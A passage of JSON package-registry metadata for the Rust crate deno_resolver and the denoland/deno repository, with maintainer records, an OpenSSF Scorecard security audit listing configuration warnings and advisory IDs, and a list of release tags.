Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-09-17T10:26:40.407Z","updated_at":"2025-09-17T10:26:40.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-08-31T14:35:57.854Z","updated_at":"2023-08-31T14:35:57.854Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10931510,"name":"deno_resolver","ecosystem":"cargo","description":"Deno resolution algorithm","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":89,"first_release_published_at":"2024-09-27T14:55:08.491Z","latest_release_published_at":"2026-08-06T11:46:36.263Z","latest_release_number":"0.88.0","last_synced_at":"2026-08-29T21:57:39.439Z","created_at":"2024-09-27T15:03:07.510Z","updated_at":"2026-08-29T21:57:39.440Z","registry_url":"https://crates.io/crates/deno_resolver/","install_command":"cargo install deno_resolver","documentation_url":"https://docs.rs/deno_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos